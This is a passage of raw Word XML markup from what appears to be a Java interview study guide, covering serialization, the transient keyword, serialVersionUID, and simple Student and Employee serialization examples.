          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Sending objects between systems (e.g., via sockets)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0375084B" w14:textId="77777777" w:rsidR="00374AB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00374AB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Caching objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCBCDA2" w14:textId="77777777" w:rsidR="00374AB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00374AB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Storing objects in databases as BLOBs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149C9606" w14:textId="77777777" w:rsidR="00374AB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00374AB1">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:pict w14:anchorId="1424E604">
          <v:rect id="_x0000_i1066" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5634134F" w14:textId="77777777" w:rsidR="00374AB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00374AB1" w:rsidP="00374AB1">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>🚫</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Things to Watch Out:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D5A135" w14:textId="77777777" w:rsidR="00374AB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00374AB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>transient</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> keyword skips fields during serialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A14BF7" w14:textId="6E76777A" w:rsidR="003B68AF" w:rsidRPr="00CE4B95" w:rsidRDefault="003B68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686695"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transien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password</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FFD2B4" w14:textId="77777777" w:rsidR="00374AB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00374AB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">Version conflicts can happen — use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>serialVersionUID</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> for version control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235F8EF4" w14:textId="434A0C11" w:rsidR="003B68AF" w:rsidRPr="00CE4B95" w:rsidRDefault="003B68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2655549"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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stat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final</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long</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> serialVersionUID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1L</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556A745A" w14:textId="77777777" w:rsidR="00374AB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00374AB1">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:pict w14:anchorId="6698E5A4">
          <v:rect id="_x0000_i1067" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFE7B6E" w14:textId="6E441F38" w:rsidR="00374AB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00374AB1" w:rsidP="00374AB1">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Simple Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195FD5C8"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880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>// Serializable class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9918AD"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88"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> java</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io</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68544F1B"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00"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056BA9BC"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uden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mplement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erializabl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0E5B4C7E"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stat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final</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long</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> serialVersionUID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1L</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F924448"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name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09525514"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t</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> age</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3696885A"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00"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F9C55A"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udent</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nam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t</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ag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5414F3AC"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thi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nam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name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D4EF7E"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thi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ag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age</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF47EB9"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27AE8A20"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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0799016D" w14:textId="6D5624BC"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880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>// Main class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D86195"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erializationExampl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6F244055"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stat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main</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String</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arg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throw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Exception</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5CC4E75A"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udent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> s1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udent</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John"</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22</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EC45E2"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00"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B41AEF0"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Serialize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E12419"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ObjectOutputStream</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ou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ObjectOutputStrea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FileOutputStream</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student.ser"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4532B71C"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writeObjec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s1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A799D1"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close</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C4CF4D"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00"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5197CA"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Deserialize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B38D98E"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ObjectInputStream</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ObjectInputStrea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FileInputStream</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student.ser"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFEE6C5"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udent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> s2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Studen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readObject</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E7C04C"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close</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5836B95A" w14:textId="1CCC23A8"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Deserialized Student: "</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s2</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nam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8800"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>", "</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s2</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age</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46718491" w14:textId="77777777" w:rsidR="00CF22AA" w:rsidRPr="00CE4B95"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6B6ED480" w14:textId="03595E15" w:rsidR="006507DC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CF22AA" w:rsidP="006507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color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148236EE" w14:textId="77E6C70A" w:rsidR="00A014B4" w:rsidRPr="00CE4B95" w:rsidRDefault="00A014B4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc196307491"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of the transient keyword in serialization?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="6282176F" w14:textId="466D6497" w:rsidR="00A014B4" w:rsidRPr="00CE4B95" w:rsidRDefault="00E46495">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>transient</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> keyword in Java is used to mark a field of a class as "non-serializable." When an object is serialized (i.e., converted into a byte stream for storage or transmission), the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>transient</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> keyword ensures that the marked field is not included in the serialization process. This is useful when you have fields that should not be persisted, such as sensitive data (e.g., passwords), or fields that can be recalculated and don't need to be saved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E85ECC" w14:textId="77777777" w:rsidR="00F54E48" w:rsidRPr="00CE4B95" w:rsidRDefault="00F54E48" w:rsidP="00F54E48">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB208D4"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88"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> java</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io</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F09649D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1665AC56"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Employe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mplement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erializabl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559115CA"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name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FDC937"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transien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t</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> salary</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This field will not be serialized</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581D0CDC"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6D833181"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Employee</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nam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t</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> salary</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5D0F1D0B"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thi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nam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name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DA2084"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thi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salary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salary</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761E228B"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7D203058"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EB97EE"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getNam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273057F5"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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
